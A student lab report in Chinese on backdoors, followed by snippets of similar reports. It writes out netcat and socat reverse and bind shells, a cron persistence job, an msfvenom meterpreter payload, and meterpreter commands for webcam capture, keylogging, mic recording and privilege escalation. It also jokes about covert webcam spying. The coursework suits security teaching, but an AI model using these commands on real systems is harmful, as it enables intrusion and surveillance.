关键词:
20155302《网络对抗》后门原理与实践
实验要求
1.使用netcat获取主机操作Shell,cron启动 (0.5分)
2.使用socat获取主机操作Shell, 任务计划启动 (0.5分)
3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
5.可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告
实验内容
•使用nc实现win,mac,Linux间的后门连接
•meterpreter的应用
•MSF POST 模块的应用
实验过程(基本后门工具实践)
1.Windows获得Linux Shell
在windows下,打开CMD,使用ipconfig
指令查看本机IP
在Linux下,打开终端,使用ifconfig
指令查看虚拟机IP
去老师给的链接下下载解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5302
命令运行ncat.exe监听5302端口。
在kali端,使用nc指令的-e选项,nc windows_ip 5302(所设置的端口) -e /bin/sh
反向连接Windows主机的5302端口。
连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。
2.Linux获得Win shell
Linux中使用nc指令,nc -l -p 5302
,监听5302端口。
Windows反弹连接Linux使用ncat.exe -e cmd.exe ip_of_linux 5302
然后,在kali端,就可以使用windows的cmd了。
3.使用netcat获取主机操作Shell,cron启动
在Windows中使用ncat.exe -l 5302
指令监听5302端口。
Linux在终端窗口使用``````nc Win的IP 端口号````命令去连接Win的5302端口。
用crontab -e
指令编辑一条定时任务(输入3,选vim.basic)
添加一行:20 * * * * /bin/netcat 172.30.1.130 5302 -e /bin/sh
,(该指令是在每个小时的第20分钟执行后面的指令)保存并退出,配置生效,可以通过crontab -l来查看。
到达你所设定的时间后,你就可以获得了kali的shell并控制它。
4.使用socat获取主机操作Shell, 任务计划启动
首先去老师的附件中下载socat。
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器。
在操作中的程序或脚本里选择下载的socat.exe的路径,添加参数中填入tcp-listen:5302 exec:cmd.exe,pty,stderr
,该命令把cmd绑定到5302端口,同时把cmd的Stderr复位到stdout。
任务创建后,右键它使任务运行。
然后在Kali环境下输入指令socat - tcp:172.30.1.130:5302
,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的5302端口,此时可以发现已经成功获得了一个cmd shell。
5. 使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
首先在kali里面输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.130 LPORT=5302 -f exe > 20155302.exe
生成后门程序(LHOST=kali linux的IP)
通过nc指令将生成的后门程序传送到Windows主机上
windows:ncat.exe -l 5302 > 20155302.exe
kali:nc 172.30.1.130 5302 < 20155302.exe
再在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口。
设置完成后,利用exploit,执行监听,在windows中,利用20155302.exe
运行2015302.exe。
此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell。
6.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic指令可以截获一段音频
2.用webcam_snap指令可以使用摄像头进行拍照
3.使用webcam_stream指令可以使用摄像头进行录像
4.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录
5.使用screenshot指令可以进行截屏
6.使用getuid指令查看当前用户,使用getsystem指令进行提权。但是由于环境问题显示提权失败,不知道为什么。
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:下载并安装某个程序,这个程序可以正常的并且完整的为我们提供服务,但是在开发改程序时可能会设计了一个后门,我们安装程序的过程中也将该后门也装入了我们的系统中。
2.例举你知道的后门如何启动起来(win及linux)的方式?
答:windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序
linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。
(3)Meterpreter有哪些给你映像深刻的功能?
控制靶机的摄像头啦当然是,使用这个可以时时知道对面在干什么,还可以偷拍。。。虽然不是很正经,但是觉得很有趣很有用。。
(4)如何发现自己有系统有没有被安装后门?
1.使用专杀木马的软件
2.关闭本机不用的端口或只允许指定的端口访问
实验总结与体会
这次实验是真滴很有趣,虽然实用性不是很大,因为有现代先进的杀毒软件的存在,但是学会了一些基本原理以及当黑客的快感,第一次觉得自己学的真的是信息安全了。
20154322杨钦涵exp2后门原理与实践(代码片段)
Exp2后门原理与实践Exp2后门原理与实践一、基础问题回答1、例举你能想到的一个后门进入到你系统中的可能方式?从网上下载软件时,可能会下载到其它附带捆绑软件,而这些软件可能就有后门程序。在安装时,便一起安装了。... 查看详情
exp2后门原理与实践(代码片段)
...标与内容 1.学习内容 使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用 2.学习目标 学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高... 查看详情
20155216exp2后门原理与实践(代码片段)
后门原理与实践常用后门工具NC或netcatnetcat是一个底层工具,进行基本的TCPUDP数据收发。常被与其他工具结合使用,起到后门的作用。Linux:一般自带netcat,"mannetcat"或"mannc"可查看其使用说明。Win获得LinuxShell1、windows打开监听先解压... 查看详情
20155312张竞予exp2后门原理与实践(代码片段)
Exp2后门原理与实践目录基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?(2)例举你知道的后门如何启动起来(win及linux)的方式?(3)Meterpreter有哪些给你映像深刻的功能?(4)如何发现自己有系统有没有被安装后... 查看详情
20155218《网络对抗》exp2后门原理与实践(代码片段)
20155218《网络对抗》Exp2后门原理与实践常用后门工具实践1.Windows获得LinuxShell:在Windows下,先使用ipconfig指令查看本机IP,使用ncat.exe程序监听本机的5218端口,在Kali环境下,使用nc指令的-e选项反向连接Windows主机的5218端口,Windows下成功... 查看详情
exp2后门原理与实践20154301仉鑫烨(代码片段)
20154301《网络对抗》Exp2后门原理与实践20154301仉鑫烨一、实验内容常用后门工具实践:Windows获得LinuxShell:在Windows下,先使用ipconfig指令查看win7虚拟机IP:使用ncat.exe程序监听本机的4301端口:Kali:使用nc指令的-e选项反向连接Window... 查看详情
20155209林虹宇exp2后门原理与实践(代码片段)
Exp2后门原理与实践实验内容一、使用netcat获取主机操作Shell,cron启动使用netcat获取主机操作ShellWin获得LinuxShell查看win的ip地址windows打开监听Linux反弹连接winwindows下获得一个linuxshell,可运行任何指令,如lsLinux获得WinShell查看kali的... 查看详情
20192204exp2-后门原理与实践(代码片段)
实验基础本次实验需要我们掌握后门的基础知识,学习使用nc实现Windows,Linux之间的后门连接,学习使用Metaspolit的msfvenom指令生成简单的后门程序,学会MSFPOST模块的应用。基础知识后门的概念后门就是不经过正常认证流程而访问... 查看详情
20155227《网络对抗》exp2后门原理与实践(代码片段)
20155227《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?在非官方网站下载软件时,后门很可能被捆绑在软件中。攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使... 查看详情
20155334曹翔exp2后门原理与实践(代码片段)
20155334曹翔Exp2后门原理与实践不多废话直接上实验过程,本实验的所有端口都是5334。一、实验过程查询主机Windows和虚拟机kali的ip地址:Windows获得LinuxShell使用ncat.exe程序监听本机的5334端口:在Kali环境下,使用nc指令的-e选项反向... 查看详情
20155321《网络攻防》exp2后门原理与实践(代码片段)
20155321《网络攻防》Exp2后门原理与实践实验内容例举你能想到的一个后门进入到你系统中的可能方式?我觉得人们在平时上网的时候可能会无意识地点击到一些恶意的网站,这些网站本身可能被黑客植入了木马程序,这些程序可... 查看详情
20155202张旭《网络对抗》exp2后门原理与实践(代码片段)
20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式?更改... 查看详情
exp2后门原理与实践20164315李华阳(代码片段)
1.后门概念 后门就是不经过正常认证流程而访问系统的通道。 常见的留后门位置有编译器留后门、操作系统留后门、最常见的当然还是应用程序中留后门、还有就是潜伏于操作系统中或伪装为特定应用的专用后门程... 查看详情
2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)
#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win,mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情
exp2mal_后门原理与实践20155214(代码片段)
Exp2MAL_后门原理与实践本次实验操使用nc实现win,mac,Linux间的后门连接学习meterpreter的应用学习MSFPOST模块的应用亲手实践建立一个后门连接,而提高自己的安全意识。[TOC]实验内容实验环境Kalilinux64bit(虚拟机)实验工具meterpreter... 查看详情
20155236范晨歌exp2后门原理与实践(代码片段)
##实验二后门原理与实践1.Windows获得LinuxShell在windows下,打开CMD,使用ipconfig指令查看本机IPncat.exe-l-p5236监听本机的5236端口在kali端,使用nc指令的-e选项,ncXXX.XXX.XXX.XXX(主机ip)5236(所设置的端口)-e/bin/sh反向连接Windows主机的5236端口... 查看详情
20154306刘宇轩网络对抗exp2后门原理与实践(代码片段)
...、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安... 查看详情
20154324刘康权《网络对抗》exp2后门原理与实践(代码片段)
...、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的安... 查看详情